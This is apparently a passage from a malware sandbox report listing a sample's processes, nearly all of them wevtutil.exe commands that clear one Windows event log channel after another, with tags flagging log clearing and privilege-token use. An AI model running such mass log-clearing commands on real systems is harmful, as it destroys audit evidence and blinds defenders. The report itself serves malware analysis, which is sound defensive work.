wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
4⤵
PID:4436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
4⤵
PID:4464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Analytic"
4⤵
PID:2104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
4⤵
PID:692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Operational"
4⤵
PID:508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
4⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
4⤵
PID:5088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
4⤵
- Clears Windows event logs
PID:4916

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
4⤵
PID:1600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
4⤵
- Clears Windows event logs
PID:3864

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
4⤵
PID:804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
4⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
4⤵
PID:1520

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
4⤵
PID:4552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
4⤵
PID:1528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
4⤵
PID:4536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
4⤵
PID:4488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
4⤵
PID:5020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
4⤵
PID:3288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
4⤵
PID:4156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
4⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
4⤵
PID:1936

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3040

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
4⤵
PID:4244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
4⤵
PID:4480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
4⤵
PID:3768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
4⤵
PID:3084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
4⤵
PID:2612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
4⤵
PID:4372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
4⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
4⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
4⤵
PID:4508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
4⤵
PID:4052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
4⤵
- Clears Windows event logs
PID:3772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
4⤵
PID:2108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppSruProv"
4⤵
PID:4980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
4⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
4⤵
PID:976

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
4⤵
PID:1616

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
4⤵
PID:2696

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
4⤵
PID:1612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
4⤵
PID:1360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
4⤵
PID:1480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
4⤵
PID:4400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
4⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
4⤵
PID:2384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
4⤵
PID:2684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
4⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
4⤵
- Clears Windows event logs
PID:4360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
4⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
4⤵
PID:4312

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
4⤵
PID:2332

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
4⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
4⤵
PID:1016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
4⤵
PID:2256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Application-Experience/Steps-Recorder"
4⤵
PID:2104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Diagnostic"
4⤵
PID:4464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ApplicationResourceManagementSystem/Operational"
4⤵
PID:4972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Debug"
4⤵
PID:4652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Operational"
4⤵
PID:1132

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AppxPackaging/Performance"
4⤵
PID:4568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Admin"
4⤵
PID:5064

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccess/Operational"
4⤵
PID:5076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Admin"
4⤵
PID:5108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AssignedAccessBroker/Operational"
4⤵
PID:1320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AsynchronousCausality/Causality"
4⤵
PID:392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
4⤵
PID:3192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/GlitchDetection"
4⤵
PID:1272

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Informational"
4⤵
PID:4288

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
4⤵
PID:4636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
4⤵
PID:5084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audio/PlaybackManager"
4⤵
PID:2772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
4⤵
PID:800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
4⤵
PID:4264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/AuthenticationPolicyFailures-DomainController"
4⤵
PID:3932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUser-Client"
4⤵
PID:416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserFailures-DomainController"
4⤵
PID:4528

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Authentication/ProtectedUserSuccesses-DomainController"
4⤵
PID:4768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
4⤵
PID:972

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic"
4⤵
- Clears Windows event logs
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTaskInfrastructure/Operational"
4⤵
PID:1436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BackgroundTransfer-ContentPrefetcher/Operational"
4⤵
- Clears Windows event logs
PID:4428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Backup"
4⤵
PID:932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Connections/Operational"
4⤵
PID:5052

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Base-Filtering-Engine-Resource-Flows/Operational"
4⤵
PID:4000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Battery/Diagnostic"
4⤵
PID:3164

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Analytic"
4⤵
PID:940

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
4⤵
PID:4836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
4⤵
PID:3968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
4⤵
PID:5004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker-Driver-Performance/Operational"
4⤵
PID:2080

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Management"
4⤵
PID:1608

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/BitLocker Operational"
4⤵
PID:2116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BitLocker/Tracing"
4⤵
PID:3152

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
4⤵
PID:1104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
4⤵
PID:3700

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-BthLEPrepairing/Operational"
4⤵
PID:2300

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
4⤵
- Clears Windows event logs
PID:5020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
4⤵
PID:3240

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
4⤵
PID:4892

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
4⤵
PID:1908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheMonitoring/Analytic"
4⤵
- Clears Windows event logs
PID:280

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
4⤵
PID:388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
4⤵
PID:2156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Catalog Database Debug"
4⤵
- Clears Windows event logs
PID:1224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
4⤵
PID:1036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
4⤵
PID:1172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
4⤵
PID:3248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentInitialize"
4⤵
PID:4220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ApartmentUninitialize"
4⤵
PID:984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/Call"
4⤵
- Clears Windows event logs
PID:4512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/CreateInstance"
4⤵
PID:632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/ExtensionCatalog"
4⤵
- Clears Windows event logs
PID:4920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COM/FreeUnusedLibrary"
4⤵
PID:1304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Activations"
4⤵
PID:1488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/MessageProcessing"
4⤵
PID:260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
4⤵
PID:2100

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
4⤵
PID:4016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"
4⤵
PID:3392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-System/Operational"
4⤵
PID:4172

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-Lifecycle-User/Operational"
4⤵
PID:3148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"
4⤵
PID:580

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Analytic"
4⤵
PID:4260

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStorageWizard/Operational"
4⤵
- Clears Windows event logs
PID:4872

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Debug"
4⤵
PID:4276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CloudStore/Operational"
4⤵
- Clears Windows event logs
PID:1068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"
4⤵
PID:2632

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"
4⤵
PID:1464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"
4⤵
PID:2984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"
4⤵
PID:3324

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"
4⤵
- Clears Windows event logs
PID:3440

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Analytic"
4⤵
PID:1244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Compat-Appraiser/Operational"
4⤵
PID:4952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Debug"
4⤵
PID:4348

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcifs/Operational"
4⤵
PID:3244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Debug"
4⤵
PID:636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Containers-Wcnfs/Operational"
4⤵
PID:1932

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Diagnostic"
4⤵
PID:3444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Operational"
4⤵
PID:4352

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreApplication/Tracing"
4⤵
PID:2184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Debug"
4⤵
PID:4436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreSystem-SmsRouter-Events/Operational"
4⤵
PID:4212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Analytic"
4⤵
PID:1472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CoreWindow/Debug"
4⤵
PID:3380

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"
4⤵
- Clears Windows event logs
PID:4984

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"
4⤵
PID:340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crashdump/Operational"
4⤵
PID:4256

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"
4⤵
PID:4992

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-BCRYPT/Analytic"
4⤵
PID:3084

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-CNG/Analytic"
4⤵
- Clears Windows event logs
PID:4988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/BackUpKeySvc"
4⤵
PID:3640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Debug"
4⤵
PID:660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DPAPI/Operational"
4⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-DSSEnh/Analytic"
4⤵
PID:4404

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-NCrypt/Operational"
4⤵
PID:2228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"
4⤵
PID:3772

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Crypto-RSAEnh/Analytic"
4⤵
PID:2108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"
4⤵
PID:1032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"
4⤵
PID:1740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Analytic"
4⤵
PID:2708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAL-Provider/Operational"
4⤵
PID:4556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DAMM/Diagnostic"
4⤵
PID:1776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"
4⤵
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Analytic"
4⤵
PID:2392

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DDisplay/Logging"
4⤵
PID:1372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DLNA-Namespace/Analytic"
4⤵
PID:4400

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"
4⤵
PID:4020

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Admin"
4⤵
PID:4228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Analytic"
4⤵
PID:2684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Debug"
4⤵
PID:672

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DSC/Operational"
4⤵
PID:4360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"
4⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"
4⤵
PID:3784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"
4⤵
PID:364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"
4⤵
PID:4284

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"
4⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"
4⤵
PID:1016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"
4⤵
PID:3788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"
4⤵
PID:4584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"
4⤵
PID:4048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"
4⤵
PID:3792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"
4⤵
PID:692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"
4⤵
PID:1648

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"
4⤵
PID:576

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"
4⤵
PID:4004

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"
4⤵
PID:1368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"
4⤵
- Clears Windows event logs
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"
4⤵
PID:5108

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"
4⤵
PID:4268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"
4⤵
PID:1592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"
4⤵
PID:4200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"
4⤵
PID:1484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"
4⤵
PID:1180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"
4⤵
PID:4456

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"
4⤵
- Clears Windows event logs
PID:904

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"
4⤵
PID:5032

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"
4⤵
PID:800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"
4⤵
PID:3124

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"
4⤵
PID:5044

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"
4⤵
PID:416

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"
4⤵
PID:1268

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"
4⤵
PID:4804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"
4⤵
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"
4⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"
4⤵
- Clears Windows event logs
PID:4184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"
4⤵
- Clears Windows event logs
PID:4488

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"
4⤵
PID:4180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"
4⤵
PID:4176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
4⤵
PID:4800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"
4⤵
- Clears Windows event logs
PID:5000

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
4⤵
PID:4740

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
4⤵
PID:5008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
4⤵
PID:3968

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
4⤵
PID:2452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
4⤵
PID:2304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
4⤵
PID:2136

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
4⤵
PID:1980

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
4⤵
PID:5080

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
4⤵
PID:1384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
4⤵
PID:4848

C:\Windows\system32\wevtutil.exe
